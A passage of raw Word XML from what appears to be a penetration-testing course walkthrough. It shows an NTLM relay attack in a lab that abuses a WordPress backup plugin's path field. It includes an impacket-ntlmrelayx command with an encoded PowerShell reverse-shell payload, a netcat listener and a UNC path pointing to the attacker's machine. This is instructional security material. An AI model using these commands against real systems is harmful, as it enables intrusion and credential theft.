          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's pause here for a moment and plan our next steps. Now, there are two promising attack vectors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DB6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The first is to upload a malicious WordPress plugin to INTERNALSRV1. By preparing and uploading a web shell or reverse shell, we may be able to obtain code execution on the underlying system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DB7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For the second attack vector, we must review the BloodHound results again and make some assumptions. As we have discovered, the local </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> account has an active session on INTERNALSRV1. Based on this session, we can assume that this user account is used to run the WordPress instance.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DB8">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Furthermore, it's not uncommon that the local </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> accounts across computers in a domain are set up with the same password. Let's assume this is true for the target environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DB9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We also learned that the domain administrator </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">beccy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has an active session on MAILSRV1 and therefore, the credentials of the user may be cached on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DBA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Due to SMB signing being disabled on MAILSRV1 and INTERNALSRV1, a relay attack is possible if we can force an authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DBB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, we identified the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup directory path</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> field in the WordPress </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup Migration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> plugin containing the path for the backup destination. This may allow us to force such an authentication request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DBC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Based on this information, let's define a plan for the second attack vector. First, we'll attempt to force an authentication request by abusing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup directory path</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the Backup Migration WordPress plugin on INTERNALSRV1. By setting the destination path to our Kali machine, we can use</w:t>
      </w:r>
      <w:hyperlink r:id="rId997">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId998">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">impacket-ntlmrelayx</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to relay the incoming connection to MAILSRV1. If our assumptions are correct, the authentication request is made in the context of the local </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> account on INTERNALSRV1, which has the same password as the local </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> account on MAILSRV1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DBD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If this attack is successful, we'll obtain privileged code execution on MAILSRV1, which we can then leverage to extract the NTLM hash for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">beccy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and therefore, meet one of the primary goals of the penetration test.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DBE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since the second attack vector not only results in code execution on a single system, but also provides a potential vector to achieve one of the goals of the penetration test, we'll perform the relay attack first.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DBF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's set up </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-ntlmrelayx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> before we modify the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup directory path</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the WordPress plugin. We'll use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--no-http-server</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-smb2support</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to disable the HTTP server and enable SMB2 support. We'll specify the external address for MAILSRV1, 192.168.50.242, as target for the relay attack. By entering the external address, we don't have to proxy our relay attack via Proxychains. Finally, we'll base64-encode a</w:t>
      </w:r>
      <w:hyperlink r:id="rId999">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1000">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PowerShell reverse shell oneliner</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that will connect back to our Kali machine on port 9999 and provide it as a command to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DC0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DC1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1236"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.242 -c "powershell -enc JABjAGwAaQ..."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DC2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DC3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we'll set up a Netcat listener on port 9999 for the incoming reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DC4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DC5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="787400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="140" name="image145.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image145.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1001"/>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2DC6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -nvlp 9999</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DC7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DC8">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now with everything set up, we can modify the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup directory path</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DC9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's set the path to the</w:t>
      </w:r>
      <w:hyperlink r:id="rId1002">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1003">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">URI reference</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">//192.168.119.5/test</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in which the IP is the address of our Kali machine and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">test</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a nonexistent path.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DCA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2247900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 24: Modified Backup directory path" id="378" name="image380.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 24: Modified Backup directory path" id="0" name="image380.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1004"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2247900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 24: Modified Backup directory path </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DCB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DCC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once entered, we can scroll down and click on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Save</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This should cause the WordPress plugin to authenticate to impacket-ntlmrelayx in the context of the user running WordPress.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DCD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DCE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2032000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="349" name="image340.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image340.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId100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2DCF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DD0">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 73 confirms the assumptions we made earlier. First, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">INTERNALSRV1/ADMINISTRATOR</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was used to perform the authentication. Second, by successfully authenticating to MAILSRV1, we confirmed that both machines use the same password for the local </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DD1">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output also states that the relayed command on MAILSRV1 got executed. Let's check our Netcat listener for an incoming reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002DD2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1727200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="103" name="image95.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image95.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId100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DD3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
